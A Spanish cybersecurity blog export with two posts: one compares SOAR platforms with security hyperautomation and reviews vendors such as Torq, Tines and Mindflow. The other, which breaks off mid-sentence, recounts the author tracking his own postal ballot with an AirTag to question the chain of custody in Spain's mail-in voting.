https://ciberseguridad.blog/security-hyperautomation-la-evolucion-del-soar-ya-esta-aqui/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2024-07-08 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > Tal vez no necesites un SOAR si no un sistema de Hyperautomatización para tu SOC. ¿ Sabes que tienen de diferentes ? Conócelo. Si estás considerando adquirir un SOAR para automatizar tus procesos de ciberseguridad, tal vez sea el momento de preguntarte si realmente es lo que necesitas. En el mundo actual, centrado en Cloud, el panorama de la ciberseguridad está en constante evolución, lo que nos lleva a reevaluar nuestras estrategias de defensa. En este contexto, han surgido dos enfoques principales: SOAR (Orquestación, Automatización y Respuesta de Seguridad - de las cuales ya os venimos hablando desde 2018 ) e Hiperautomatización de Seguridad. Dado que la nube ofrece API comparativas y la naturaleza de los servicios y la responsabilidad compartida es distinta a la de las cargas de trabajo tradicionales en instalaciones físicas, es fundamental entender cuál de estos enfoques se adapta mejor a tus necesidades. Un SOAR es una plataforma diseñada para mejorar la eficiencia y eficacia de las operaciones de ciberseguridad. Su principal objetivo es orquestar y automatizar procesos repetitivos, permitiendo una respuesta más rápida y coordinada ante incidentes de seguridad. Un SOAR integra diferentes herramientas de seguridad, sistemas de TI y equipos humanos para agilizar la gestión de amenazas y reducir el tiempo de respuesta. Por otro lado, la Hiperautomatización de Seguridad lleva la automatización un paso más allá. No solo se trata de automatizar procesos existentes, sino de integrar inteligencia artificial y aprendizaje automático para identificar y responder a amenazas de manera proactiva y autónoma. Este enfoque abarca una visión más holística y adaptativa de la ciberseguridad, aprovechando datos en tiempo real y análisis predictivos para anticiparse a posibles ataques. En el entorno cloud, donde las API y la naturaleza de los servicios difieren significativamente de las infraestructuras tradicionales, es crucial entender cómo cada enfoque se adapta a estos cambios. La integración de servicios en la nube a través de API permite que un SOAR automatice la respuesta a incidentes, mientras que la hiperautomatización utiliza estas integraciones para aprender y adaptarse continuamente. La hiperautomatización ofrece una mayor adaptabilidad a medida que las amenazas evolucionan, escalando y ajustándose automáticamente a nuevos tipos de amenazas sin intervención humana. Aunque ambos enfoques buscan mejorar la eficiencia, la hiperautomatización puede reducir aún más la carga operativa mediante la eliminación de tareas manuales y la toma de decisiones basadas en datos en tiempo real. La seguridad en la nube es una responsabilidad compartida entre el proveedor de servicios y el usuario. Un SOAR puede ayudar a gestionar esta responsabilidad, pero la hiperautomatización proporciona una capa adicional de inteligencia que comprende mejor las dinámicas específicas de cada entorno de nube. La elección entre SOAR y Hiperautomatización de Seguridad dependerá de tus necesidades específicas, el tamaño de tu organización y el nivel de sofisticación de las amenazas a las que te enfrentas. Si buscas una solución que te permita una integración rápida y una mejora significativa en la respuesta a incidentes, un SOAR podría ser la opción adecuada. Sin embargo, si tu objetivo es estar un paso adelante en la evolución de las amenazas y maximizar la eficiencia a través de la inteligencia artificial, la Hiperautomatización de ciberseguridad puede ser la respuesta. La ciberseguridad en la cloud requiere enfoques modernos y adaptativos. Ya sea que optes por un SOAR o por la Hiperautomatización de seguridad, es esencial comprender las fortalezas y limitaciones de cada enfoque para tomar una decisión informada. Evalúa tus necesidades y elige la solución que te brinde la mejor combinación de eficiencia, adaptabilidad y protección proactiva para tu entorno de nube. Es este post, voy a intentar acercarte un poquito de estos conceptos , para que puedas ver las distintas diferencias, para automatizar tus procesos de la mejor forma posible. Los desafíos de un SOAR tradicional y entornos cloud SOAR ha sido fundamental en la integración de herramientas de ciberseguridad para agilizar las respuestas y neutralizar las amenazas. Sin embargo, con la extensión a cloud, el enfoque SOAR tradicional se enfrenta a varios desafíos: [Imagen: Hyperautomatización VS SOAR] - Problemas de escalabilidad: Los entornos cloud se expanden rápidamente, y es posible que los playbook predefinidos de SOAR no se amplíen tan rápidamente debido a la capacidad de respuesta basada en la API. A medida que las empresas crecen y adoptan más servicios cloud, los sistemas SOAR pueden quedar rezagados, incapaces de mantener el ritmo con la expansión y la complejidad creciente de los entornos en la nube. - Falta de adaptabilidad en tiempo real para la respuesta cloud: La naturaleza dinámica de los servicios en la nube, con cargas de trabajo ligeramente acopladas y asincrónicas, significa que las amenazas pueden transformarse y evolucionar rápidamente, a menudo sin dejar rastro claro. Los sistemas SOAR tradicionales pueden tener dificultades para adaptarse a estas amenazas en tiempo real, ya que sus respuestas predefinidas pueden no ser lo suficientemente flexibles para abordar nuevas y emergentes formas de ataques. - Limitaciones de la integración: Las principales plataformas cloud, como AWS, Azure y GCP, introducen continuamente nuevos servicios y actualizan sus infraestructuras. La integración de estos servicios dentro de un marco SOAR puede ser extremadamente laboriosa y consumir mucho tiempo. Además, la integración entre diferentes nubes añade otra capa de complejidad, especialmente con los servicios de gestión de identidad y acceso (IAM) que están en constante evolución. Esto puede llevar a una carga significativa en los equipos de ciberseguridad, que deben mantenerse al día con estos cambios constantes. - Complejidad: A medida que las arquitecturas cloud se vuelven más intrincadas, gestionar la seguridad a través de un SOAR puede volverse cada vez más complejo. La configuración y el mantenimiento de las integraciones, las respuestas automatizadas y los flujos de trabajo pueden convertirse en una tarea abrumadora. Esta complejidad no solo incrementa el esfuerzo necesario para mantener la solución SOAR, sino que también puede introducir puntos de fallo potenciales y aumentar el riesgo de errores humanos en la configuración y operación. La tecnología SOAR ha sido una herramienta poderosa en ciberseguridad, pero su aplicación en entornos cloud, presenta desafíos significativos. La rápida expansión de estos entornos, la necesidad de adaptabilidad en tiempo real, las constantes actualizaciones e introducciones de nuevos servicios en las plataformas cloud y la creciente complejidad de las arquitecturas de nube hacen que los enfoques tradicionales de SOAR puedan no ser suficientes. Por ello, es crucial considerar estas limitaciones al evaluar si SOAR es la solución adecuada para la seguridad cloud de nuestra organización o si se necesita un enfoque más avanzado y adaptativo como la hiperautomatización de seguridad. ## Estado del arte de las nuevas plataformas SOC Creo que esta imagen, capta a la perfección las nuevas y emergentes tecnologías y compañías que estarán presentes en la evolución de los SOC del futuro: [Imagen: Nuevas tecnologías y empresas] Centrándonos en lo que creo que es el foco principal del futuro de los SOC , con problemas que yo ya percibo , y sobre los que la hyperautomatización pone foco. - Las empresas no han obtenido el beneficio de sus plataformas de automatización actuales. A medida que las grandes empresas han contruido equipos SOC exitosos con soluciones SIEM y una amplia gama de herramientas de ciberseguridad, han tenido que lidiar con las crecientes alertas que generan estas herramientas. La combinación de expansión de herramientas, escasez de habilidades y fatiga de alerta ha provocado la necesidad de soluciones de automatización. - Dados los recientes avances en IA, particularmente en torno a los LLM, aún no se ha visto el verdadero valor de las herramientas de automatización de ciberseguridad. O más bien, lo veremos amplificado, por que valor tiene. Se está empezando a fraguar una revolución que ya esta empezando. El mercado se está preparando para una evolución significativa en el funcionamiento de los equipos de SOC y el futuro de la automatización de SOC. El punto álgido de contrataciones de ciberseguridad, empezará a disminuirse en mi opinión, de forma muy importante, centrándonos en perfiles N1. Y todo esto, lo apreciamos en el importante aumento en la actividad de inversión, con más de 175 millones de dólares de capital desplegados en empresas de hiperautomatización/A-SOC en lo que vamos de año. Tener muy presente estas empresas: [Imagen: Inversión en empresas de Hyperautomatización o Automatización de SOCs] Erik Bloch, Jefe de Detección y Respuesta de Atlassian, autor del Manifiesto de Métricas de Operaciones de Seguridad, ha escrito extensamente sobre las funciones clave del SOC. Donde podemos ver el tiempo invertido: [Imagen: Tiempo invertido en incidentes de ciberseguridad] La automatización tiene un propósito claro: permitir que las máquinas se encarguen de las tareas repetitivas, que son monótonas y consumen mucho tiempo. Al hacerlo, se libera al talento humano para que se enfoque en actividades más importantes y creativas, esas que requieren un toque personal. El resultado es una fuerza laboral más eficiente, rentable y productiva. Pero vemos ejemplo de la evolución de esta automatización a la Hyperautomatización que la sustituirá y de la que venimos a hablar: 1. IAM: Automatizar los procesos de incorporación y baja de usuarios, asegurando que los derechos de acceso y los permisos se actualicen dinámicamente a medida que se producen cambios en el equipo ( Se acabo eso de que tu responsable te lo cambie ), llegando a tener una pseudo revisión de acceso en tiempo real para mantener el cumplimiento de la ciberseguridad y reducir los riesgos. Mis orígenes en la ciberseguridad fueron en el área de gestión de identidades y esto, me parece algo maravilloso. 2. Búsqueda de amenazas: Automatizar el proceso de recopilación de datos de fuentes dispares para identificar rápidamente las amenazas en todo el entorno. Permitiendo las respuestas automatizadas a las amenazas identificadas, agilizando el proceso de corrección. 3. CSPM: Los casos de uso incluyen monitorización continua y comprobaciones de cumplimiento en entornos cloud para garantizar que las configuraciones cumplan con las mejores prácticas y estándares. Otro caso de uso , sería la automatización de configuraciones erróneas o cambios no autorizados, revirtiendo rápidamente los cambios o alertando a los equipos. Puede que quien tenga un SOAR y este en este punto, este diciendo, pero si yo puedo hacerlo también sin problemas ... aterricemos algunas diferencias ... ## Soluciones SOAR vs Hiperautomatización Necesitamos tener en cuenta que las soluciones SOAR legacy ( Se me saltan un poco las lágrimas, pero dentro de estas, por ejemplo, incluiríamos a XSOAR por ejemplo ) ayudaron y ayudan a nuestros equipos SOC. Sin embargo, las soluciones de automatización de próxima generación y a diferencia de estas, manejan los playbook yendo más allá, manejando una gama más amplia de dominios y casos de uso según lo indicado en toda la pila de seguridad de CISSP ( Que por cierto, este verano quiero aprovechar a sacar la certificación ). Estos pilares incluyen la seguridad de activos, la arquitectura e ingeniería de ciberseguridad, la gestión de identidad y acceso, la evaluación y pruebas de ciberseguridad, la seguridad de desarrollo de software y la seguridad de la red, además de los dominios cubiertos por SOAR ( Este párrafo define perfectamente las principales diferencias ) , ademas de lo indicado de adaptabilidad Cloud. Una organizaciones podrían preferir SOAR si su objetivo principal es optimizar sus operaciones de SOC, como la respuesta a incidentes, la inteligencia de amenazas, la medicina forense y la gestión de vulnerabilidades. Por el contrario, la hiperautomatización podría ser una mejor opción para las organizaciones que buscan implementar una estrategia de automatización integral en varias funciones y departamentos de ciberseguridad. [Imagen: Hyperautomatización Torq] En esta imagen de la conocida empresa de hyperautomatización Torq , nos viene trasladar de forma gráfica las diferencias entre un SOAR y su plataforma ( que podría valernos para todas las que hemos visto anteriormente ) , si vienen algunas de ellas no estoy del todo de acuerdo en que una solución SOAR , no sea capaz de llevarla a cabo, hay otras noches en las que por ejemplo la hiperautomatización encaja mucho mejor, por ejemplo en el desarrollo de software seguro, análisis sw riesgos GRC ... Todo ello, centrado en dos conceptos principales, que se heredan de los SOAR tradicionales, pero que toman mucha más importancia cuando hablamos de entornos Cloud o entornos híbridos : Mean Time to Detect (MTTD) , Mean Time to Response (MTTRes), Mean Time to Remediate (MTTRem) ### Mean Time to Detect (MTTD) El Tiempo Medio para Detectar (MTTD) es una métrica crucial en el mundo de la ciberseguridad. Básicamente, mide cuánto tiempo pasa desde que surge un problema de ciberseguridad hasta que alguien se da cuenta y empieza a solucionarlo. También se le conoce como Tiempo Medio para Descubrir o Identificar. Es un indicador clave de rendimiento (KPI) muy utilizado en la gestión de incidentes. ¿Por qué es importante? Un MTTD más corto significa que los usuarios experimentan menos interrupciones y problemas con los sistemas de TI. En otras palabras, cuanto más rápido detectemos los problemas, menos tiempo estarán sufriendo los usuarios. ### Mean Time to Response (MTTRes) ¿Alguna vez te has preguntado cuánto tiempo se tarda en responder a una amenaza de ciberseguridad? Bueno, eso es exactamente lo que mide el Tiempo Medio de Respuesta (MTTRes), estoy abriendo una caja de Pandora buena, porque como esto lo vea algún CISO, que sepas que después de vacaciones empezara a pedírtelos 😄 . Y aquí es donde la hiperautomatización entra en juego, prometiendo reducir drásticamente este tiempo. La clave para reducir el MTTRes está en las arquitecturas basadas en eventos. Estas arquitecturas están diseñadas para actuar de inmediato cuando se detecta una amenaza. Imagina que tu sistema recibe una alerta de seguridad, en lugar de esperar a que un humano intervenga, la arquitectura basada en eventos toma las riendas y comienza a resolver el problema en tiempo real. Las arquitecturas basadas en eventos utilizan flujos de datos en tiempo real y webhooks para activar respuestas automáticas. Servicios como AWS GuardDuty o Azure Defender generan estos eventos, pero no siempre actúan automáticamente, especialmente cuando deben interactuar con múltiples nubes y herramientas de seguridad. Aquí es donde la hiperautomatización marca la diferencia. Al integrar varias plataformas y automatizar los procesos con bots de flujo de trabajo, podemos reducir el MTTRes de manera significativa. Servicios como AWS EventBridge o Azure Event Grid, junto con herramientas de análisis como AWS CloudWatch o Azure Log Analytics, trabajan en conjunto con soluciones de hiperautomatización. Esta combinación permite a las organizaciones minimizar el impacto de las amenazas rápidamente. Pero la hiperautomatización no solo se trata de ciberseguridad, ofreciendo beneficios adicionales como: - Optimización de costos: Gestiona eficientemente los gastos en la nube. - Automatización de copias de seguridad: Asegura que tus datos estén siempre protegidos. - Integración entre plataformas: Facilita operaciones fluidas en AWS, Azure y GCP. - IA Generativa: Mejora la toma de decisiones y ofrece notificaciones inteligentes y contextuales. La hiperautomatización está transformando la forma en que se manejará la ciberseguridad cloud. Al reducir el tiempo de respuesta a las amenazas y optimizar otros aspectos operativos, estas herramientas están liderando el camino hacia un entorno cloud más seguro y eficiente. Por lo que, la próxima vez que escuches sobre MTTRes, ya sabes que la hiperautomatización es la clave para mantener a raya las amenazas y mejorar la resiliencia de tu infraestructura cloud. ### Mean Time to Remediate (MTTRem) Cuando hablamos de seguridad en cloud, el término "remediación" se refiere al tiempo que se tarda en solucionar las brechas o vulnerabilidades de seguridad. La hiperautomatización juega un papel crucial aquí, ya que puede reducir significativamente este tiempo. Herramientas de automatización son capaces de identificar rápidamente las vulnerabilidades y, usando llamadas a la API en cloud, recogen los datos necesarios y ejecutan acciones correctivas predefinidas sin necesidad de intervención humana. Este enfoque sistemático asegura que las amenazas se neutralicen rápidamente, disminuyendo el tiempo en el que nuestras aplicaciones y datos están en riesgo. Las plataformas en la nube, como AWS, Azure o Google Cloud, ofrecen APIs robustas que permiten hacer llamadas a servicios de carga de trabajo. Al utilizarlas, es posible detectar configuraciones incorrectas de manera similar a una herramienta de gestión de la postura de seguridad en la nube (CSPM). El siguiente paso es desarrollar flujos de trabajo de hiperautomatización para solucionar estas fallas, incorporando mecanismos de aprobación humana cuando sea necesario. La hiperautomatización cloud no solo acelera la detección y corrección de problemas de ciberseguridad, sino que también asegura que nuestras aplicaciones estén protegidas con la mayor rapidez posible. ## Actores relevantes en hyperautomatización de ciberseguridad ### TORQ Esta herramienta está transformando los equipos de operaciones de seguridad (SOC) al ofrecer una solución integral que automatiza y gestiona las tareas de los analistas de SOC. Al utilizar inteligencia artificial (IA), Torq facilita la investigación, clasificación y resolución de incidentes de seguridad a gran escala, permitiendo que los analistas se concentren en tareas más críticas mientras la plataforma maneja la carga pesada. Torq, fundada en 2020 por expertos, se basa en un profundo conocimiento de los desafíos a los que se enfrentan los equipos de ciberseguridad. Esta experiencia ha sido fundamental para crear una plataforma efectiva y bien conectada con las necesidades reales del sector. A diferencia de otras herramientas como Tines (Luego hablaremos de ella), Torq ofrece características únicas que la destacan en el mercado. Su arquitectura es completamente cloud y emplea procesamiento de lenguaje natural (PNL) e inteligencia artificial para recopilar, analizar y filtrar datos de una amplia gama de herramientas de seguridad. Lo que realmente distingue a Torq es su capacidad para manejar eventos y alertas de seguridad de manera eficiente, incluso durante picos de actividad, superando con creces las capacidades de las soluciones tradicionales de SOAR. La solución más reciente de Torq, HyperSOC, lleva la automatización a un nuevo nivel. Permite a los equipos de seguridad manejar alertas de falsos positivos, gestionar investigaciones y responder a incidentes sin necesidad de habilidades técnicas avanzadas. HyperSOC es intuitivo y fácil de usar gracias a sus flujos de trabajo basados en playbook, lo que reduce significativamente el tiempo y la complejidad de la implementación en comparación con otras soluciones. Además, Torq ha desarrollado un marco de integración integral y abierto que permite una gran extensibilidad. Su arquitectura permite una conexión perfecta a cualquier sistema dentro de la infraestructura de una organización, desde servicios en la nube como AWS, GCP y Azure, hasta sistemas locales. Este enfoque abierto es crucial para crear una postura de seguridad unificada que se integre en diversos entornos. Una de las mayores fortalezas de Torq es su enfoque "DIY" para la integración, que permite a las empresas crear integraciones personalizadas sin necesidad de servicios profesionales costosos. Esto no solo mejora su utilidad, sino que también reduce el costo total de propiedad. La plataforma es compatible con una amplia variedad de lenguajes de programación y secuencias de comandos, lo que permite a los usuarios técnicos incorporar su propio código y mejorar la versatilidad del sistema en entornos de TI complejos. El análisis de Torq y sus competidores revela que Torq tiene más casos de uso y está bien integrado en los equipos de seguridad. Su HyperSOC ofrece una amplia conectividad e integraciones abiertas en cualquier pila de seguridad e infraestructura. Mejora las capacidades de los profesionales de SecOps mediante el uso de la IA generativa para investigar automáticamente la gravedad de las amenazas e iniciar la escalada óptima y la resolución estratégica de manera eficiente. En resumen, los diferenciadores clave de Torq incluyen su arquitectura, extensibilidad e integración profunda dentro de los equipos de SOC. El importante crecimiento de la compañía en los últimos cuatro años subraya estos puntos. Crear una solución de automatización para una pequeña startup es una cosa, pero hacerlo a gran escala introduce un conjunto completamente nuevo de complejidades. Torq ha demostrado su capacidad para ejecutar y escalar su solución de automatización de manera efectiva. [Vídeo: What to Automate First in Your SOC - Intro to Torq Webinar](https://www.youtube.com/watch?v=x8X2bn9bNVc) O por ejemplo, un caso de automatización de accesos en gestión de identidad ( IAM ) , bastante impactante : [Vídeo: Identity Access Management (IAM) Automation - Intro to Torq Webinar](https://www.youtube.com/watch?v=LUPzY0xhi_k) ### Tines Lo primero que notarás de Tines es su enfoque amigable. No necesitas ser un genio de la programación para usarlo, aunque esta claro que ciertos conceptos necesitas. Sus soluciones sin código y de bajo código permiten que cualquiera en el equipo, incluso sin grandes conocimientos técnicos, pueda aprovechar la automatización. Esto significa menos barreras y más manos a la obra. [Vídeo: Tines 101](https://www.youtube.com/watch?v=XvZAbRCgCKk) ¿Tienes herramientas o fuentes de datos que ya usas y amas? No hay problema. Tines te permite integrarlas sin complicaciones. Esto es vital para los Centros de Operaciones de Seguridad (SOC) que necesitan adaptarse rápidamente a nuevas amenazas sin esperar actualizaciones de proveedores. Con Tines, puedes construir, ejecutar y monitorizar las tareas con un soporte de backend sólido, lo que garantiza fiabilidad en entornos de misión crítica. Tines no se limita solo a la seguridad ( Nuestros SOC no solo se construye con Playbook de ciberseguridad , si no también alta, baja de clientes, roles , dispositivos ... ) . Esta versatilidad ha permitido a Tines expandirse más allá de la seguridad tradicional, abordando una amplia gama de necesidades comerciales. Estos puntos pueden ayudar a nuestro CIO para decantarse mejor 😀. Otro punto fuerte de Tines es su capacidad para reemplazar plataformas SOAR tradicionales como XSOAR, Phantom y Demisto, especialmente en mercados de alta gama. Su flexibilidad para operar en diferentes entornos (locales, en la nube o híbridos) y ofrecer implementaciones de un solo inquilino hace que sea la opción preferida para empresas que necesitan opciones de implementación versátiles. El entorno me recuerda mucho a TraceCat . Han mejorado sus capacidades de automatización con inteligencia artificial ( Que como veis, es algo que esta muy de moda ), especialmente en los procesos de construcción y ejecución. Estas nuevas funciones utilizan modelos de lenguaje seguros y privados, garantizando que los datos nunca salgan del inquilino. La IA permite generar código automáticamente a partir de las indicaciones del usuario, acelerando la construcción de flujos de trabajo robustos, algo que por ejemplo ya podemos ver en PowerAutomate ... que yo uso mucho, y la verdad que va muy bien. Tines está bien posicionada para liderar tanto en el mercado de la automatización de la seguridad como en el ámbito más amplio de la automatización empresarial. IMPORTANTE: Tiene una versión gratuita limitada, pero que nos da bastantes opciones a la hora de poder probar la plataforma. Podéis registraros sin ningún tipo de problema y jugar todo lo que queráis, es muy interesante. Uso bastante Microsoft Power Automate, y no entiendo como Microsoft no evoluciona hacia un producto de este estilo. No tiene la potencia de Torq , pero puede encajar en ciertas entidades. ### MindFlow Mindflow es como ese compañero genial que te ayuda a automatizar y simplificar todas esas tareas repetitivas en el mundo de la ciberseguridad, pero sin necesidad de ser un experto en programación ( Esto es algo de lo que se caracteriza esa nueva hyperautomatización ). Con Mindflow, puedes automatizar la gestión de alertas de phishing, la administración de vulnerabilidades, la inteligencia de amenazas y mucho más. Recopila información de diferentes sistemas para que los analistas de seguridad puedan enriquecer y clasificar alertas, respondiendo a incidentes de forma más rápida y efectiva. La magia de Mindflow radica en su simplicidad y flexibilidad. A diferencia de otras soluciones SOAR, "no necesitas ser un desarrollador para usarlo" ( Entre comillas ). Puedes crear flujos de trabajo que se adapten a los procesos más complejos de nuestra empresa, y se ejecutan automáticamente. Esto significa que incluso aquellos con habilidades técnicas básicas pueden automatizar tareas repetitivas y centrarse en asuntos más importantes. Para llevar la automatización a otro nivel, Mindflow cubre todos los procesos empresariales, lógicas y servicios, integrando más de 650 productos ( tiene un muy amplio catalogo ) y ofreciendo una automatización sin fisuras gracias a sus API. [Vídeo: Mindflow Automation GEN AI](https://www.youtube.com/watch?v=2QcL7Im2QnI) ## Conclusiones de la Hyperautomatización Como hemos visto a lo largo del post, la evolución de los SOAR hacia la hyperautomatización es un estado más que presente, en la que dependiendo de las necesidades de cada organización, deberemos decantarnos hacia un SOAR o hacia la hyperautomatización. Uno de los principales puntos que nos ha decantarnos hacia uno u otro, es la evolución de nuestra empresa en lo referente a los sistemas en cloud. Pero no solo deberemos tener esto como único punto de inflexión, si la cantidad de sistemas necesarios a ser integrados, no solo por parte del equipo de seguridad, sino también por otras partes de la organización. Un SOC, va mucho más allá de alertas o PlayBook puramente relacionados con posibles incidentes de seguridad. La hyperautomatización, viene para automatizar todos los flujos referentes a nuestros procesos de seguridad, incluyendo también aquellos que anteriormente no teníamos en cuenta, como la gestión de riesgos, la gestión de identidad, la corrección de vulnerabilidades y bastionados. Desde mi punto de vista, este es el inicio del final de auge en ciberseguridad en lo referente a contrataciones. a lo largo de varios años, se ha contratado a una cantidad ingente de personal N1, poco cualificado en que realizaba o realiza tareas procedimentadas, que será sustituido por esta hyperautomatización, puede sonar algo fuerte esto que voy a indicar, pero en mi opinión, gran parte de todas esas personas no van a ser capaces de adaptarse a nuevos requisitos --- # ¿ Es seguro el voto por correo ? URL: https://ciberseguridad.blog/es-seguro-el-voto-por-correo/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2024-06-09 Actualizado: 2026-10-04 Tema: Laboratorios de ciberseguridad > Introducimos un GPS en un Voto por correo, para poder afirmar que NO lo es. Hoy, arriesgo mi "culo" , con fines, puramente científicos, intentando cambiar las cosas, o al menos, removiendo ciertos pensamientos que hagan cambiarlo a futuro. Marie Curie, se expuso a la radiación. Galileo Galilei , se enfrentó a la inquisición. O Alexander Bogdanov , experimento en su propio cuerpo con transfusiones de sangre. Ni mucho menos, intento compararme o aproximarme a tales figuras, pero si , me gustaría trasladaros, que este post, puede tener ciertos problemas legales hacia mi persona. Con el mismo, tampoco quiero poner en duda el gran trabajo que se hace por el personal de correos, si no, lo que me gustaría poner en duda en si, es el propio sistema o metodología del voto por correo en España. > Hoy, arriesgo mi "culo" , con fines, puramente científicos Más adelante os contare todas las implicaciones que el post podría haber tenido. ## ¿Por qué tengo dudas del sistema? De los fondos Europeos, España recibirá aproximadamente 140.000 millones de euros del fondo de recuperación Next Generation EU hasta 2026. De esta cantidad, alrededor de 27.000 millones de euros están específicamente destinados a la digitalización. ( 5.000 millones de euros para la digitalización de pymes, 3.999 millones de euros para Conectividad y 5G , 15.000 millones de euros, 3.750 millones de euros ya incluidos en los presupuestos de este año, para ciberseguridad, creación de ecosistemas tecnológicos y formación en competencias digitales. Todo ello, grandísimas inversiones CAPEX con un OPEX que deberá mantenerse en el tiempo, si la AAPP es capaz de ello. Yo estoy personalmente viendo grandes cambios y avances a nivel de ciberseguridad, y lo digo de corazón , aunque hayamos tenido la mayor filtración de AAPP de la historia con la DGT esta semana pasada. Grandes inversiones , en las que, mas allá de "Carpeta Ciudadana" , y desde aquí traslado mi enhorabuena, no se estan viendo cambios de cara al ciudadano. En este post, voy a trasladaros uno de los cambios sobre los que considero, debería invertirse algo de esos 140.000 millones, y que es , y ligado al proceso de votación del próximo domingo ( Estoy iniciando este post en Jueves 6 de Junio ), uno de los procesos más críticos de nuestro estado. > No podemos hablar de IA o blockchain , y seguir votando por correo mediante un sobre. El proceso en sí de voto por correo, si lo ligamos al mundo del análisis forense , creo que podríamos afirmar , que no cumple con la cadena de custodia pertinente. O al menos, no se le informa al ciudadano ( Correos trasladará que siempre se cumple ) , quien debería conocer y tener toda la certeza de que su voto no pudo ser alterado en ningún momento. Pero aterricemos esto un poco mas , en un caso real, el mio, mas concretamente : - La solicitud en si de voto por correo, creo que es perfecta si hablamos de solicitud mediante certificado, tan sencillo como disponer de un certificado electrónico, entrar en la web de correos, y solicitar el voto. Un proceso que no deja lugar a duda, de quien , cuando y como se pidió el voto. Este proceso, deja ciertas dudas, como ya hemos visto en alguna ocasión, si se solicita en la oficina de correos directamente. - Una vez solicitado el voto por correo, este te llega vía certificado a la dirección que has trasladado, donde se remite el voto, con absolutamente todas las papeletas de los partidos políticos a los que se pueden votar. Este proceso también es correcto, por parte del personal de correos, comprueban el DNI a la hora de dejar el certificado, y solo se lo dejan a la persona que solicitó el voto. El proceso es correcto. A partir de aquí, es donde empezaron a surgirme las dudas, ya que simplemente , el voto va en un sobre ( 1 ) , dentro de otro sobre ( 2 ) , lo que permitiría , replicando el sobre ( 2 ) , el cual no tiene nada en especial , introducir un voto ( 1 ) que nos diese la gana. Tan sencillo como eso. [Imagen: Sobres de Voto por Correo España] Como podemos ver , un proceso sencillo según la web de CGT Correos , que indica: Voto por correo desde España: Recibida la documentación, el elector presentará el sobre modelo oficial (S.3.1) ( Como podemos ver en la parte inferior izquierda del sobre ) “Certificado urgente” y código de barras que empieza por las letras VE (Voto emitido), dirigido a la mesa electoral, conteniendo el certificado de inscripción en el censo electoral y el de votación en el que se incluirá la papeleta, en cualquier oficina postal de España. El envío se cursa como certificado y urgente, con carácter gratuito. Las USE/URO recepcionarán y custodiarán estos despachos, para posteriormente entregarlos a los presidentes de las Mesas electorales (o vocales que les sustituyan) el mismo día de la jornada electoral; en este caso no se utiliza la PDA. ( Un punto importante y que ellos marcan ) [Imagen: Sobre exterior de voto por correo en España.] Las características del sobre S.3.1 no van mas allá de características de envio , tipo y recepción. El código, posiblemente si sea de un emisor único e impida replicarlos pero hasta este punto, es fácil decir que podríamos cambiar con pocos problemas el voto interior y que incluso, se podrían crear solicitudes de votos. Ya que al ciudadano no le llega confirmación ninguna de que votase. Pero del otro lado del voto, si hay listas de votantes ... Si un ciudadano no voto en los últimos 15 comicios ... por que iría a votar en estos ¿ no ?. Y otro de los puntos que ahora desarrollare más y que también me inquietaba es , ¿ Donde esta mi voto ?¿ Por cuantas manos paso ?¿ Que están haciendo con el ?¿ Llegará ? ... El ciudadano , una vez emitido el voto en su oficina de correos, pierde toda trazabilidad del mismo, de su estado , de si realmente llego, o si llego el voto que el realmente emitio ... por lo que decidí jugarme el culo para averiguarlo. ### La cadena de custodia de los votos por correo del lado del ciudadano Podríamos tener la respuesta a varias de las preguntas de una forma muy sencilla, por lo que sí ... me decidí a poner un localizador a mi voto por correo. En este caso un AirTag nuevecito ( Aparte del culo , el post me costará 35€ ) , pero habrá merecido la pena si se remueve alguna conciencia: [Imagen: AirTag en el voto por correo interior.] Por lo que , me puse manos a la obra , y empece a configurar el AirTag. Para quien no lo conozca, los AirTag son el sistema de localización de objetos de Apple, usado normalmente para localizar llaves ... ( Yo los compré por que el niño me tenia loco de búsqueda todos los días ) ... y que si alguno se lo esta planteando , no pueden ser usados para localizar a personas ( Apple tiene una serie de mecanismos para evitar esto, como vemos en el video ), más allá de que es ilegal. [Vídeo: Qué son los AirTag de Apple y como funcionan 🤔](https://www.youtube.com/watch?v=82Id1NmJKSs) Uno de los puntos importantes, es que usa otros dispositivos Apple para emitir la localización, lo que no la hace continua si no los hay cerca. Pero hay millones de dispositivos siempre cerca, por lo que antes o después, sabremos de nuestro AirTag. Con ello, nos pusimos al lio a configurar el mismo, el cual pusimos como nombre ( VOTO POR CORREO ) y un Emoji que me gusta mucho 🥸 . [Imagen: Nobre AirTag] Asociándolo a mi cuenta de Apple ( Soy muy Pro Apple para quien no lo sepa ) : [Imagen: Asociación de AirTag Voto por correo a cuenta Apple] Todo configurado, parece que esta correcto. Y podríamos localizar nuestro voto por correo y donde estaría en cada momento: [Imagen: Ubicación en vivo de un AirTag oculto en el sobre del voto por correo] Una vez todo en marcha , y listos para ver el recorrido de nuestro voto por correo, creo que lo mejor de todo, es poner una cronología de tiempos. Por mi parte, presenté el voto el último día posible , por lo que los tiempos en alguno de los puntos por donde pasa , se acortará notablemente , ya que si lo remitimos con mucho mas tiempo, estará parado en algún punto, prácticamente hasta los días anteriores, como en mi caso. ### Jueves 6 de Junio a las 18:09 [Imagen: Foto del resguardo E122 de Correos con la hora de envío del voto por correo] Fui a emitir el voto por correo. Con sospechas de que no diese el peso adecuado y no pudiese mandarlo, pero finalmente , tras unos momentos tensos por que pesaba 18 gramos , y sonó como un canto pelón cuando se dejo en la balanza , fue emitido. [Imagen: Bandeja de entrada mostrando el correo de admisión de Correos recibido a las 18:14] Correos emite un resguardo. Pero ojo, un resguardo que no nos sirve absolutamente para trazar nada . Te da un identificador , sobre el cual en la web, puedes comprobar que el correo es de correos, y además , tan mal diseñado, que solo puedes comprobarlo una vez: [Imagen: Código de email seguro de correos] Un proceso que lo úrico de lo que nos sirve , por si tenemos dudas, de comprobar una única vez que el correo recibido, no se trata de un phising: [Imagen: Identificador correos] [Imagen: Error comprobación código correos] Una vez emitido el voto por correo y fuera de la oficina , teníamos que comprobar que todo fuese correcto, y que podríamos seguir a nuestro voto por correo en la lejanía: [Imagen: Mapa mostrando el voto por correo en la Calle del Bachiller de Huelva] Perfecto, nuestro AirTag lo marcaba sin lugar a dudas: [Imagen: Oficina de correos en los Rosales] ### Viernes 7 de Junio a las 06:26 Ansioso , nada más levantarme , comprobé que el voto por correo había pasado la noche en la oficina . Su ultima conexión fue a las 20:32h , dándose esto, ya que el AirTag se conecta via Bluetooth con otros dispositivos Apple, momento en el que cerrarían las oficinas. Estas oficinas, contarán con algún sistema de alarma , pero con total seguridad, no cuentan con ningún tipo de vigilante jurado o similar . Una 